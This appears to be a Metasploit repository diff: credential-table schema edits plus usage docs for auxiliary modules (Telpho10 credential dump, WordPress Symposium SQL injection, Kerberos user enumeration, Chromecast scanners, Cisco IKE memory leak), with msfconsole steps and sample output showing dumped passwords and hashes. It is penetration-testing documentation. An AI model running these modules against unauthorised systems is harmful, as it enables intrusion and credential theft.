+  add_index "metasploit_credential_cores", ["workspace_id", "private_id"], name: "unique_private_metasploit_credential_cores", unique: true, where: "((realm_id IS NULL) AND (public_id IS NULL) AND (private_id IS NOT NULL))", using: :btree
+  add_index "metasploit_credential_cores", ["workspace_id", "public_id", "private_id"], name: "unique_realmless_metasploit_credential_cores", unique: true, where: "((realm_id IS NULL) AND (public_id IS NOT NULL) AND (private_id IS NOT NULL))", using: :btree
+  add_index "metasploit_credential_cores", ["workspace_id", "public_id"], name: "unique_public_metasploit_credential_cores", unique: true, where: "((realm_id IS NULL) AND (public_id IS NOT NULL) AND (private_id IS NULL))", using: :btree
+  add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "private_id"], name: "unique_publicless_metasploit_credential_cores", unique: true, where: "((realm_id IS NOT NULL) AND (public_id IS NULL) AND (private_id IS NOT NULL))", using: :btree
+  add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "public_id", "private_id"], name: "unique_complete_metasploit_credential_cores", unique: true, where: "((realm_id IS NOT NULL) AND (public_id IS NOT NULL) AND (private_id IS NOT NULL))", using: :btree
+  add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "public_id"], name: "unique_privateless_metasploit_credential_cores", unique: true, where: "((realm_id IS NOT NULL) AND (public_id IS NOT NULL) AND (private_id IS NULL))", using: :btree
  add_index "metasploit_credential_cores", ["workspace_id"], name: "index_metasploit_credential_cores_on_workspace_id", using: :btree

  create_table "metasploit_credential_logins", force: :cascade do |t|
@@ -320,7 +321,8 @@ ActiveRecord::Schema.define(version: 20160415153312) do
    t.string   "jtr_format"
  end

-  add_index "metasploit_credential_privates", ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, using: :btree
+  add_index "metasploit_credential_privates", ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, where: "(NOT ((type)::text = 'Metasploit::Credential::SSHKey'::text))", using: :btree
+  add_index "metasploit_credential_privates", ["type"], name: "index_metasploit_credential_privates_on_type_and_data_sshkey", unique: true, where: "((type)::text = 'Metasploit::Credential::SSHKey'::text)", using: :btree

  create_table "metasploit_credential_publics", force: :cascade do |t|
    t.string   "username",   null: false
@@ -800,12 +802,13 @@ ActiveRecord::Schema.define(version: 20160415153312) do

  create_table "workspaces", force: :cascade do |t|
    t.string   "name"
-    t.datetime "created_at",                                    null: false
-    t.datetime "updated_at",                                    null: false
-    t.string   "boundary",         limit: 4096
-    t.string   "description",      limit: 4096
+    t.datetime "created_at",                                      null: false
+    t.datetime "updated_at",                                      null: false
+    t.string   "boundary",           limit: 4096
+    t.string   "description",        limit: 4096
    t.integer  "owner_id"
-    t.boolean  "limit_to_network",              default: false, null: false
+    t.boolean  "limit_to_network",                default: false, null: false
+    t.boolean  "import_fingerprint",              default: false
  end

 end
@@ -0,0 +1,29 @@
+This module plays (by default) [https://www.youtube.com/watch?v=kxopViU98Xo]("Epic sax guy 10 hours") on a target Google Chromecast via YouTube.
+
+Naturally, audio should be cranked to 11 before running this module.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/chromecast_webserver ```
+2. Do: ```set RHOST [IP]```
+3. Do: ```run```
+
+## Options
+
+  **VID**
+
+  The YouTube video to be played.  Defaults to [https://www.youtube.com/watch?v=kxopViU98Xo](kxopViU98Xo)
+
+## Sample Output
+
+Of note, this was played on a 1st generation Google Chromecast (USB stick looking, not circular)
+
+```
+msf > auxiliary/admin/chromecast/chromecast_youtube
+msf auxiliary(chromecast_youtube) > set rhost 10.10.10.196
+rhost => 10.10.10.196
+msf auxiliary(chromecast_youtube) > run
+
+[+] Playing https://www.youtube.com/watch?v=kxopViU98Xo
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,133 @@
+## Vulnerable Application
+
+  Telpho10 v2.6.31 (32-bit Linux ISO image download [here](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso)).
+
+  Supporting documentation for this product can be found [here](http://www.telpho.de/downloads.php).
+
+## Verification Steps
+
+  The following steps will allow you to install and dump the credentials from a Telpho10 instance:
+
+  1. Download the [Telpho10 ISO image](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso) and install in a VM (or on a system)
+    - note that the ISO will default to a German keyboard layout
+    - note that the ISO expects a SATA hard drive (not IDE/PATA) for installation
+  1. configure the Telpho10's IP address
+    - edit /etc/networks/interfaces accordingly
+  1. Start msfconsole
+  1. Do: ```use auxiliary/admin/http/telpho10_credential_dump```
+  1. Do: ```set RHOST <IP address of your Telpho10 instance> ```
+  1. Do: ```run```
+  1. You should see a list of the retrieved Telpho10 credentials
+
+## Scenarios
+
+  Example output when using this against a Telpho10 v2.6.31 VM:
+
+  ```
+$ ./msfconsole
+                                                  
+# cowsay++
+ ____________
+< metasploit >
+ ------------
+       \   ,__,
+        \  (oo)____
+           (__)    )\
+              ||--|| *
+
+
+       =[ metasploit v4.12.36-dev-16fc6c1                 ]
+ -- --=[ 1596 exploits - 908 auxiliary - 273 post        ]
+ -- --=[ 458 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
+
+msf > use auxiliary/admin/http/telpho10_credential_dump
+msf auxiliary(telpho10_credential_dump) > set RHOST 10.0.2.35
+RHOST => 10.0.2.35
+msf auxiliary(telpho10_credential_dump) > run
+
+[*] Generating backup
+[*] Downloading backup
+[+] File saved in: /home/pbarry/.msf4/loot/20161028155202_default_10.0.2.35_telpho10.backup_185682.tar
+[*] Dumping credentials
+
+[*] Login (/telpho/login.php)
+[*] -------------------------
+[+] Username: admin
+[+] Password: telpho
+
+[*] MySQL (/phpmyadmin)
+[*] -------------------
+[+] Username: root
+[+] Password: telpho
+
+[*] LDAP (/phpldapadmin)
+[*] --------------------
+[+] Username: cn=admin,dc=localdomain
+[+] Password: telpho
+
+[*] Asterisk MI (port 5038)
+[*] -----------------------
+[+] Username: telpho
+[+] Password: telpho
+
+[*] Mail configuration
+[*] ------------------
+[+] Mailserver: 
+[+] Username:   
+[+] Password:   
+[+] Mail from:  
+
+[*] Online Backup
+[*] -------------
+[+] ID:       
+[+] Password: 
+
+[*] Auxiliary module execution completed
+msf auxiliary(telpho10_credential_dump) > 
+```
+
+I navigated my browser to the admin page of the UI and changed some of the password values, then ran the module again to verify I see the updated values:
+
+```
+msf auxiliary(telpho10_credential_dump) > run
+
+[*] Generating backup
+[*] Downloading backup
+[+] File saved in: /home/pbarry/.msf4/loot/20161028161929_default_10.0.2.35_telpho10.backup_044262.tar
+[*] Dumping credentials
+
+[*] Login (/telpho/login.php)
+[*] -------------------------
+[+] Username: admin
+[+] Password: s3cr3t
+
+[*] MySQL (/phpmyadmin)
+[*] -------------------
+[+] Username: root
+[+] Password: telpho
+
+[*] LDAP (/phpldapadmin)
+[*] --------------------
+[+] Username: cn=admin,dc=localdomain
+[+] Password: ldaps3cr3t
+
+[*] Asterisk MI (port 5038)
+[*] -----------------------
+[+] Username: telpho
+[+] Password: asterisks3cr3t
+
+[*] Mail configuration
+[*] ------------------
+[+] Mailserver: 
+[+] Username:   
+[+] Password:   
+[+] Mail from:  
+
+[*] Online Backup
+[*] -------------
+[+] ID:       
+[+] Password: 
+
+[*] Auxiliary module execution completed 
+  ```
@@ -0,0 +1,65 @@
+## Vulnerable Application
+
+  The auxiliary/admin/http/wp_symposium_sql_injection works for WordPress
+  Symposium plugin before 15.8. The Pro module version has not been verified.
+
+  To download the vulnerable application, you can find it here:
+  https://github.com/wp-plugins/wp-symposium/archive/15.5.1.zip
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ```use auxiliary/admin/http/wp_symposium_sql_injection```
+  3. Do: ```set RHOST <ip>```
+  4. Set TARGETURI if necessary.
+  5. Do: ```run```
+
+## Scenarios
+
+  Example run against WordPress Symposium plugin 15.5.1:
+
+  ```
+  msf > use auxiliary/admin/http/wp_symposium_sql_injection
+  msf auxiliary(wp_symposium_sql_injection) > show info
+
+         Name: WordPress Symposium Plugin SQL Injection
+       Module: auxiliary/admin/http/wp_symposium_sql_injection
+      License: Metasploit Framework License (BSD)
+         Rank: Normal
+    Disclosed: 2015-08-18
+
+  Provided by:
+    PizzaHatHacker
+    Matteo Cantoni <goony@nothink.org>
+
+  Basic options:
+    Name        Current Setting  Required  Description
+    ----        ---------------  --------  -----------
+    Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+    RHOST                        yes       The target address
+    RPORT       80               yes       The target port
+    SSL         false            no        Negotiate SSL/TLS for outgoing connections
+    TARGETURI   /                yes       The base path to the wordpress application
+    URI_PLUGIN  wp-symposium     yes       The WordPress Symposium Plugin URI
+    VHOST                        no        HTTP server virtual host
+
+  Description:
+    SQL injection vulnerability in the WP Symposium plugin before 15.8
+    for WordPress allows remote attackers to execute arbitrary SQL
+    commands via the size parameter to get_album_item.php.
+
+  References:
+    http://cvedetails.com/cve/2015-6522/
+    https://www.exploit-db.com/exploits/37824
+
+  msf auxiliary(wp_symposium_sql_injection) > set RHOST 1.2.3.4
+  RHOST => 1.2.3.4
+  msf auxiliary(wp_symposium_sql_injection) > set TARGETURI /html/wordpress/
+  TARGETURI => /html/wordpress/
+  msf auxiliary(wp_symposium_sql_injection) > run
+
+  [+] 1.2.3.4:80 - admin           $P$ByvWm3Hb653Z50DskJVdUcZZbJ03dJ. admin.foobar@mail.xyz
+  [+] 1.2.3.4:80 - pippo           $P$BuTaWvLcEBPseEWONBvihacEqpHa6M/ pippo.foobar@mail.xyz
+  [+] 1.2.3.4:80 - pluto           $P$BJAoieYeeCDujy7SPQL1fjDULrtVJ3/ pluto.foobar@mail.xyz
+  [*] Auxiliary module execution completed
+  ```
@@ -0,0 +1,214 @@
+The module use the Censys REST API to access the same data accessible through web interface. The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.
+
+## Verification Steps
+
+1. Do: `use auxiliary/gather/censys_search`
+2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX`
+3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX`
+4. Do: `set CENSYS_SEARCHTYPE certificates`
+5: Do: `set CENSYS_DORK rapid7`
+6: Do: `run`
+
+## Sample Output
+
+#### Certificates Search
+
+```
+msf auxiliary(censys_search) > set CENSYS_DORK rapid7
+CENSYS_DORK => rapid7
+msf auxiliary(censys_search) > set CENSYS_SEARCHTYPE certificates
+CENSYS_SEARCHTYPE => certificates
+...
+[+] 199.15.214.152 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 31.214.157.19 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 31.220.7.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 168.253.216.190 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 52.88.1.225 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 208.118.237.41 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 64.125.235.5 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 208.118.237.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 208.118.237.40 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 208.118.227.12 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 208.118.237.38 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 23.48.13.195 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 208.118.227.14 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 54.230.252.134 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 54.230.249.63 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 54.230.249.242 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 54.230.249.187 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 54.230.249.64 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 54.230.249.181 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 54.230.249.17 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 54.230.249.183 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 54.230.249.186 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 199.15.214.152 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 31.214.157.19 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 31.220.7.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 168.253.216.190 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 52.88.1.225 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
+[+] 208.118.237.41 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 64.125.235.5 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 208.118.237.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 208.118.237.40 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 208.118.227.12 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 208.118.237.38 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 23.48.13.195 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 208.118.227.14 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 54.230.252.134 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 54.230.249.63 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 54.230.249.242 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 54.230.249.187 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 54.230.249.64 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 54.230.249.181 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 54.230.249.17 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 54.230.249.183 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 54.230.249.186 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 199.15.214.152 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 31.214.157.19 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 31.220.7.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 168.253.216.190 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 52.88.1.225 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
+[+] 208.118.237.41 - CN=NeXpose Security Console, O=Rapid7
+...
+
+```
+
+### IPv4 Search
+
+```
+msf auxiliary(censys_search) > set CENSYS_DORK rapid7
+CENSYS_DORK => rapid7
+msf auxiliary(censys_search) > set CENSYS_SEARCHTYPE ipv4
+CENSYS_SEARCHTYPE => ipv4
+[*] 197.117.5.36 - 443/https
+[*] 208.118.237.81 - 443/https
+[*] 206.19.237.19 - 443/https
+[*] 54.214.49.70 - 80/http,443/https
+[*] 208.118.237.241 - 443/https
+[*] 162.220.246.141 - 443/https,22/ssh,80/http
+[*] 31.214.157.19 - 443/https,22/ssh
+[*] 52.88.1.225 - 443/https,22/ssh
+[*] 208.118.227.12 - 25/smtp
+[*] 38.107.201.41 - 443/https
+[*] 52.44.56.126 - 80/http,443/https
+[*] 52.54.227.6 - 443/https,80/http
+[*] 23.217.253.242 - 443/https,80/http
+[*] 96.6.3.45 - 80/http,443/https
+[*] 23.6.73.47 - 443/https,80/http
+[*] 23.78.99.243 - 80/http,443/https
+[*] 23.53.51.170 - 80/http,443/https
+[*] 23.62.201.47 - 443/https,80/http
+[*] 2.23.50.157 - 443/https,80/http
+[*] 118.215.191.13 - 80/http,443/https
+[*] 2.19.185.28 - 80/http,443/https
+[*] 2.18.195.99 - 443/https,80/http
+[*] 23.197.196.25 - 443/https,80/http
+[*] 95.100.104.181 - 443/https,80/http
+[*] 2.20.37.130 - 80/http,443/https
+[*] 23.194.237.34 - 443/https,80/http
+[*] 2.17.140.86 - 443/https,80/http
+[*] 64.125.235.5 - 25/smtp
+[*] 208.118.227.32 - 80/http
+[*] 2.21.129.149 - 80/http,443/https
+[*] 2.20.167.33 - 80/http,443/https
+[*] 95.100.139.218 - 80/http,443/https
+[*] 23.38.88.202 - 443/https,80/http
+[*] 2.17.184.80 - 443/https,80/http
+[*] 23.59.119.23 - 80/http,443/https
+[*] 2.16.14.225 - 443/https,80/http
+[*] 104.113.122.33 - 443/https,80/http
+[*] 23.223.44.164 - 80/http,443/https
+[*] 88.221.120.214 - 443/https,80/http
+[*] 23.47.36.145 - 443/https,80/http
+[*] 2.23.21.254 - 80/http,443/https
+[*] 208.118.237.39 - 443/https
+[*] 208.118.237.40 - 443/https
+[*] 208.118.237.41 - 443/https
+[*] 23.54.217.47 - 80/http,443/https
+[*] 96.17.254.188 - 443/https,80/http
+[*] 184.25.129.65 - 443/https,80/http
+[*] 104.121.167.123 - 443/https,80/http
+[*] 104.94.110.63 - 443/https,80/http
+[*] 104.91.11.216 - 80/http,443/https
+[*] 23.38.233.47 - 80/http,443/https
+[*] 52.86.110.89 - 80/http,443/https
+[*] 69.192.73.47 - 443/https,80/http
+[*] 184.86.57.47 - 443/https,80/http
+[*] 104.86.45.180 - 443/https,80/http
+[*] 184.87.72.153 - 80/http,443/https
+[*] 23.66.25.47 - 80/http,443/https
+[*] 23.56.162.76 - 80/http,443/https
+[*] 184.87.133.242 - 443/https,80/http
+[*] 23.55.74.28 - 80/http,443/https
+[*] 23.6.225.84 - 80/http,443/https
+[*] 23.46.133.153 - 443/https,80/http
+[*] 23.10.121.47 - 443/https,80/http
+[*] 104.109.35.169 - 80/http,443/https
+[*] 172.227.101.182 - 80/http,443/https
+[*] 184.27.23.104 - 80/http,443/https
+[*] 23.49.185.47 - 80/http,443/https
+[*] 23.67.172.177 - 80/http,443/https
+[*] 23.62.170.161 - 443/https,80/http
+[*] 23.219.71.35 - 443/https,80/http
+[*] 104.82.94.233 - 443/https,80/http
+[*] 184.26.73.47 - 80/http,443/https
+[*] 104.68.108.237 - 80/http,443/https
+[*] 23.60.39.77 - 80/http,443/https
+[*] 23.66.100.92 - 80/http,443/https
+[*] 23.61.28.182 - 443/https,80/http
+[*] 23.42.116.233 - 80/http,443/https
+[*] 104.105.14.197 - 80/http,443/https
+[*] 104.103.203.240 - 80/http,443/https
+[*] 104.65.57.235 - 80/http,443/https
+[*] 23.41.83.224 - 80/http,443/https
+[*] 184.51.185.47 - 80/http,443/https
+[*] 23.67.231.142 - 80/http,443/https
+[*] 208.118.237.38 - 443/https
+[*] 104.76.25.28 - 80/http,443/https
+[*] 23.196.125.176 - 443/https,80/http
+[*] 23.40.154.224 - 80/http,443/https
+[*] 23.77.33.204 - 443/https,80/http
+[*] 104.88.21.48 - 80/http,443/https
+[*] 173.223.134.47 - 80/http,443/https
+[*] 23.4.98.72 - 80/http,443/https
+[*] 23.44.97.3 - 80/http,443/https
+[*] 23.203.66.142 - 443/https,80/http
+[*] 23.42.216.251 - 443/https,80/http
+[*] 23.42.85.25 - 80/http,443/https
+[*] 173.255.195.131 - 80/http,23/telnet,25/smtp,110/pop3,53/dns,443/https,22/ssh
+[*] 104.83.219.182 - 443/https,80/http
+[*] 184.86.41.47 - 443/https,80/http
+[*] 104.97.72.196 - 443/https,80/http
+[*] 69.192.169.48 - 443/https,80/http
+```
+
+### Websites Search
+
+```
+msf auxiliary(censys_search) > set CENSYS_DORK rapid7
+CENSYS_DORK => rapid7
+msf auxiliary(censys_search) > set CENSYS_SEARCHTYPE websites
+CENSYS_SEARCHTYPE => websites
+msf auxiliary(censys_search) > run
+
+[+] rapid7.com - [37743]
+[+] logentries.com - [45346]
+[+] venturefizz.com - [106102]
+[+] gild.com - [116853]
+[+] sectools.org - [122125]
+[+] ericzhang.me - [155622]
+[+] metasploit.com - [156435]
+[+] datapipe.com - [209756]
+[+] routerpwn.com - [317896]
+[+] proxy-base.com - [507954]
+[+] config.fr - [542346]
+[+] winterwyman.com - [629471]
+[+] gogrid.com - [741009]
+[+] wesecure.nl - [997423]
+[*] Auxiliary module execution completed
+```
+
+
+## References
+
+1. https://censys.io/api
@@ -0,0 +1,99 @@
+The kerberos_enumusers module is used to enumerate valid Domain Users
+via Kerberos from a wholly unauthenticated perspective. It utilises the
+different responses returned by the service to identify users that exist
+within the target domain. It is also able to identify whether user
+accounts are enabled or disabled/locked out.
+
+## Target
+
+To use kerberos_enumusers, make sure you are able to connect to the
+Kerberos service on a Domain Controller.
+
+## Scenario
+
+The following demonstrates basic usage, using a custom wordlist,
+targeting a single Domain Controller to identify valid domain user
+accounts.
+
+```
+msf > use auxiliary/gather/kerberos_enumusers
+msf auxiliary(kerberos_enumusers) > set DOMAIN MYDOMAIN
+DOMAIN => MYDOMAIN
+msf auxiliary(kerberos_enumusers) > set RHOST 192.168.5.1
+RHOST => 192.168.5.1
+msf auxiliary(kerberos_enumusers) > set USER_FILE /job/users.txt
+USER_FILE => /job/users.txt
+msf auxiliary(kerberos_enumusers) > run
+
+[*] Validating options...
+[*] Using domain: MYDOMAIN...
+[*] 192.168.5.1:88 - Testing User: "bob"...
+[*] 192.168.5.1:88 - KDC_ERR_PREAUTH_REQUIRED - Additional
+pre-authentication required
+[+] 192.168.5.1:88 - User: "bob" is present
+[*] 192.168.5.1:88 - Testing User: "alice"...
+[*] 192.168.5.1:88 - KDC_ERR_PREAUTH_REQUIRED - Additional
+pre-authentication required
+[+] 192.168.5.1:88 - User: "alice" is present
+[*] 192.168.5.1:88 - Testing User: "matt"...
+[*] 192.168.5.1:88 - KDC_ERR_PREAUTH_REQUIRED - Additional
+pre-authentication required
+[+] 192.168.5.1:88 - User: "matt" is present
+[*] 192.168.5.1:88 - Testing User: "guest"...
+[*] 192.168.5.1:88 - KDC_ERR_CLIENT_REVOKED - Clients credentials have
+been revoked
+[-] 192.168.5.1:88 - User: "guest" account disabled or locked out
+[*] 192.168.5.1:88 - Testing User: "admint"...
+[*] 192.168.5.1:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in
+Kerberos database
+[*] 192.168.5.1:88 - User: "admint" does not exist
+[*] 192.168.5.1:88 - Testing User: "admin"...
+[*] 192.168.5.1:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in
+Kerberos database
+[*] 192.168.5.1:88 - User: "admin" does not exist
+[*] 192.168.5.1:88 - Testing User: "administrator"...
+[*] 192.168.5.1:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in
+Kerberos database
+[*] 192.168.5.1:88 - User: "administrator" does not exist
+[*] Auxiliary module execution completed
+msf auxiliary(kerberos_enumusers) >
+```
+
+## Options
+
+The kerberos_enumusers module only requires the RHOST, DOMAIN and
+USER_FILE options to run.
+
+**The DOMAIN option**
+
+This option is used to specify the target domain. If the domain name is
+incorrect an error is returned and domain user account enumeration will fail.
+
+An example of setting DOMAIN:
+
+```
+set DOMAIN [domain name]
+```
+
+**The USER_FILE option**
+
+This option is used to specify the file containing a list of user names
+to query the Domain Controller to identify if they exist in the target domain
+or not. One per line.
+
+An example of setting USER_FILE:
+
+```
+set USER_FILE [path to file]
+```
+
+**The Timeout option**
+
+This option is used to specify the TCP timeout i.e. the time to wait
+before a connection to the Domain Controller is established and data read.
+
+An example of setting Timeout:
+
+```
+set Timeout [value in seconds]
+```
@@ -0,0 +1,38 @@
+This module is a scanner which enumerates Google Chromecast via its HTTP interface (default port 8008).  The WiFi access point the Chromecast is also enumerated.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/chromecast_webserver ```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```run```
+
+## Sample Output
+
+Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
+
+```
+msf > use auxiliary/scanner/http/chromecast_webserver 
+msf auxiliary(chromecast_webserver) > set threads 10
+threads => 10
+msf auxiliary(chromecast_webserver) > set verbose true
+verbose => true
+msf auxiliary(chromecast_webserver) > set rhosts 10.10.10.0/24
+rhosts => 10.10.10.0/24
+msf auxiliary(chromecast_webserver) > run
+
+[+] 10.10.10.25:8008     - Chromecast "Guest Bedroom" is connected to Rapid7_wifi
+[*] Scanned  26 of 256 hosts (10% complete)
+[*] Scanned  52 of 256 hosts (20% complete)
+[*] Scanned  78 of 256 hosts (30% complete)
+[*] Scanned 108 of 256 hosts (42% complete)
+[*] Scanned 128 of 256 hosts (50% complete)
+[*] Scanned 154 of 256 hosts (60% complete)
+[*] Scanned 183 of 256 hosts (71% complete)
+[+] 10.10.10.192:8008    - Chromecast "Bedroom" is connected to Rapid7_wep
+[+] 10.10.10.196:8008    - Chromecast "cast" is connected to Rapid7_wep
+[*] Scanned 213 of 256 hosts (83% complete)
+[*] Scanned 232 of 256 hosts (90% complete)
+[+] 10.10.10.236:8008    - Chromecast "Basement" is connected to Rapid7_wep
+[*] Scanned 256 of 256 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,65 @@
+This module is a scanner which enumerates WiFi access points visible from a Google Chromecast via its HTTP interface (default port 8080).  Any WiFi access point the Chromecast is associated with or can be associated with is marked with an `(*)`.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/chromecast_wifi```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```run```
+
+## Sample Output
+
+Of note, all 3 of the devices are the 1st generation Google Chromecast (USB stick looking, not circular)
+
+```
+msf > use auxiliary/scanner/http/chromecast_wifi 
+msf auxiliary(chromecast_wifi) > set rhosts 10.10.10.0/24
+rhosts => 10.10.10.0/24
+msf auxiliary(chromecast_wifi) > set threads 20
+threads => 20
+msf auxiliary(chromecast_wifi) > set verbose true
+verbose => true
+msf auxiliary(chromecast_wifi) > run
+
+Wireless Access Points from 10.10.10.11
+========================================
+
+BSSID              PWR  ENC   CIPHER  AUTH  ESSID
+-----              ---  ---   ------  ----  -----
+00:11:22:33:44:55  -59  WPA2  CCMP    PSK   Rapid7 (*)
+aa:11:22:33:44:66  -71  OPN                 xfinitywifi
+
+[*] Scanned  26 of 256 hosts (10% complete)
+[*] Scanned  53 of 256 hosts (20% complete)
+[*] Scanned  79 of 256 hosts (30% complete)
+[*] Scanned 105 of 256 hosts (41% complete)
+[*] Scanned 129 of 256 hosts (50% complete)
+[*] Scanned 154 of 256 hosts (60% complete)
+Wireless Access Points from 10.10.10.12
+=========================================
+
+BSSID              PWR  ENC   CIPHER  AUTH  ESSID
+-----              ---  ---   ------  ----  -----
+bb:aa:22:33:44:66  -94  WPA   TKIP    PSK   wifi
+bb:aa:cc:dd:44:66  -54  WPA2  CCMP    PSK   wifi2 (*)
+
+[*] Scanned 180 of 256 hosts (70% complete)
+Wireless Access Points from 10.10.10.16
+=========================================
+
+BSSID              PWR  ENC   CIPHER  AUTH  ESSID
+-----              ---  ---   ------  ----  -----
+bb:aa:cc:dd:44:66  -54  WPA2  CCMP    PSK   wifi2 (*)
+
+[*] Scanned 222 of 256 hosts (86% complete)
+Wireless Access Points from 10.10.10.23
+=========================================
+
+BSSID              PWR  ENC   CIPHER  AUTH  ESSID
+-----              ---  ---   ------  ----  -----
+bb:aa:cc:dd:44:66  -63  WPA2  CCMP    PSK   wifi2 (*)
+00:11:22:33:44:55  -85  WPA2  CCMP    PSK   Rapid7 (*)
+
+[*] Scanned 241 of 256 hosts (94% complete)
+[*] Scanned 256 of 256 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,34 @@
+This module is for CVE-2016-6415, A vulnerability in Internet Key Exchange version 1 (IKEv1) packet processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software could allow an unauthenticated, remote attacker to retrieve memory contents, which could lead to the disclosure of confidential information.
+
+The vulnerability is due to insufficient condition checks in the part of the code that handles IKEv1 security negotiation requests. An attacker could exploit this vulnerability by sending a crafted IKEv1 packet to an affected device configured to accept IKEv1 security negotiation requests. A successful exploit could allow the attacker to retrieve memory contents, which could lead to the disclosure of confidential information.
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/ike/cisco_ike_benigncertain```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```run```
+
+## Sample Output
+
+```
+msf auxiliary(cisco_ike_benigncertain) > show options
+
+Module options (auxiliary/scanner/ike/cisco_ike_benigncertain):
+
+   Name        Current Setting                                                                            Required  Description
+   ----        ---------------                                                                            --------  -----------
+   PACKETFILE  /opt/metasploit-framework/data/exploits/cve-2016-6415/sendpacket.raw                       yes       The ISAKMP packet file
+   RHOSTS      192.168.1.2                                                                                yes       The target address range or CIDR identifier
+   RPORT       500                                                                                        yes       The target port
+   THREADS     1                                                                                          yes       The number of concurrent threads
+
+msf auxiliary(cisco_ike_benigncertain) > set verbose True
+msf auxiliary(cisco_ike_benigncertain) > run
